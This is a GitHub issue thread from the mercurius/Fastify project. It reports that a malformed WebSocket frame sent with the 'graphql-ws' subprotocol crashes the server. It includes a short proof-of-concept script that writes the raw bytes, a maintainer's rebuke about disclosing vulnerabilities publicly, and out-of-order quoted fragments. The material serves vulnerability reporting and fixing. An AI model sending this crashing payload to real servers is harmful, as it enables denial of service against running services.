Closed marcolanaro closed 1 year ago
Last time it was an issue in @fastify/websocket
, this time I'm not so sure.
For comparison, if I remove mercurius
from the equation, I was able to crash a standard fastify websocket server, now I'm not able anymore. Follow an example that was crashing before @fastify/websocket@7.1.1
.
crash_it.js
:
const WebSocket = require('ws');
const ws = new WebSocket('ws://127.0.0.1:2000', 'graphql-ws');
ws.on('open', function open() {
ws._socket.write(Buffer.from([0xa2, 0x00]));
});
index.js
:
const Fastify = require('fastify')
const fastifyWebsocket = require('@fastify/websocket')
async function start() {
const fastify = Fastify()
await fastify.register(fastifyWebsocket)
await fastify.listen({ port: 2000 })
}
start();
This is the second time you disclose a security vulnerability publicly. Please stop and report them privately instead.
I apologise, this is the first time I've been told not to. It will not happen again.
Most project will have a SECURITY.md file. You should have followed the instructions there:
https://github.com/mercurius-js/mercurius/blob/master/SECURITY.md
It looks like the server crash in specific conditions. This is related to #908. I thought i solved it with https://github.com/fastify/fastify-websocket/pull/228, but that's not completely true.
Before that PR, I was able to crash
mercurius
with:Now that's happening only specifying the websocket protocol. Given this server
index.js
:I can crash it executing this script
crash_it.js
(see the second parameter of Websocket class):